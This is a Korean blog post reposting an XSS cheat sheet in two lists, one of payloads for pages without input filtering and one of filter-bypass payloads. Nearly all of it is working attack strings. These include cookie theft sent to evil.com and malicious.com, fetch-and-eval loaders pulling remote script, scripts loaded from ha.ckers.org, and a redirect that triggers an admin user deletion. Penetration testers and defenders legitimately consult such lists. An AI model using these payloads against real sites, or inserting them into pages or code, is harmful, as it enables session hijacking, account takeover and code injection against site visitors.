- https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45
| XSS Cheat Sheet - 패턴 Filter 미 적용 시 (None Bypass Filter)
- <script>alert('XSS')</script>
- <img src="javascript:alert('XSS')">
- <a href="javascript:alert('XSS')">Click me</a>
- <iframe src="javascript:alert('XSS')"></iframe>
- <object data="javascript:alert('XSS')"></object>
- <meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
- <body onload="alert('XSS')">
- <input type="text" value="<script>alert('XSS')</script>">
- <script src="http://evil.com/malicious.js"></script>
- <style>@import 'http://evil.com/malicious.css';</style>
- <svg/onload=alert('XSS')>
- <!-- <script>alert('XSS')</script> -->
- <a href="http://example.com?param=<script>alert('XSS')</script>">Link</a>
- <form action="http://example.com"><input type="text" name="input" value="<script>alert('XSS')</script>"></form>
- <script>fetch('http://malicious.com').then(response => response.text()).then(data => eval(data))</script>
- <script>document.write('<img src="http://malicious.com/cookie?'+document.cookie+'">')</script>
- <div onclick="alert('XSS')">Click me</div>
- <video src="javascript:alert('XSS')"></video>
- <audio src="javascript:alert('XSS')"></audio>
- <button onclick="alert('XSS')">Click me</button>
- <a href="http://example.com?search=<script>alert('XSS')</script>">Search</a>
- javascript:void(alert('XSS'))
- <input type="text" onfocus="alert('XSS')">
- <input type="image" src="x" onerror="alert('XSS')">
- <link href="javascript:alert('XSS')">
- <img src="data:image/png;base64,..." onerror="alert('XSS')">
- <script>window.location='http://evil.com?cookie='+document.cookie;</script>
- <script>eval("alert('XSS')")</script>
- <svg><script>alert('XSS')</script></svg>
- <body background="javascript:alert('XSS')">
- <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script>alert('XSS')</script>
- <div data-content="<script>alert('XSS')</script>">
- <script>document.write('<iframe src="http://malicious.com"></iframe>');</script>
- <img src="http://example.com" onerror="fetch('http://evil.com').then(response => response.text()).then(data => eval(data))">
- <form action="http://example.com" method="post"><input type="submit" value="<script>alert('XSS')</script>"></form>
- <script>setTimeout(() => {alert('XSS')}, 1000);</script>
- <input type="text" value="<img src='invalid' onerror='alert(1)'>">
- <meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
- <iframe src="javascript:alert('XSS')">
- <form><input type="text" name="query" value="<script>alert('XSS')</script>"></form>
- <img src="x" onerror="fetch('http://evil.com')" />
- <div><a href="http://example.com/redirect?param=<script>alert('XSS')</script>">Click here</a></div>
- <h1 onmouseover="alert('XSS')">Hover over me</h1>
- <script src="http://evil.com/attack.js"></script>
- <input type="text" value="normaltext" onfocus="alert('XSS')">
- <svg><script>document.location='http://malicious.com?cookie='+document.cookie;</script></svg>
- <script>document.getElementById('output').innerHTML = '<img src="http://malicious.com">';</script>
- <script>fetch('http://evil.com/cookie?data=' + document.cookie);</script>
- <video><source src="http://malicious.com/video.mp4" onerror="alert('XSS')"></video>
- <div onmouseover="fetch('http://evil.com/malicious.js').then(response => response.text()).then(eval)">Hover me</div>
| XSS Cheat Sheet - 패턴 Filter 적용 시 (Bypass Filter)
- <SCRIPT>alert('XSS')</SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <BASE HREF="javascript:alert('XSS');//">
- <BGSOUND SRC="javascript:alert('XSS');">
- <BODY BACKGROUND="javascript:alert('XSS');">
- <BODY ONLOAD=alert('XSS')>
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC=javascript:alert('XSS')>
- <IMG DYNSRC="javascript:alert('XSS');">
- <IMG LOWSRC="javascript:alert('XSS');">
- <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- exp/*<XSS STYLE='no\xss:noxss("*//*");
- <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
- <IMG SRC='vbscript:msgbox("XSS")'>
- <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
- <IMG SRC="livescript:[code]">
- %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- <IMG SRC="mocha:[code]">
- <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
- a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <XSS STYLE="xss:expression(alert('XSS'))">
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
- <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
- <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
- <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
- <HTML xmlns:xss>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
- <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
- <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
- <HTML><BODY>
- <!--[if gte IE 4]>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
- <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
- <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <? echo('<SCR)';
- <BR SIZE="&{alert('XSS')}">
- <IMG SRC=JaVaScRiPt:alert('XSS')>
댓글 없음:
댓글 쓰기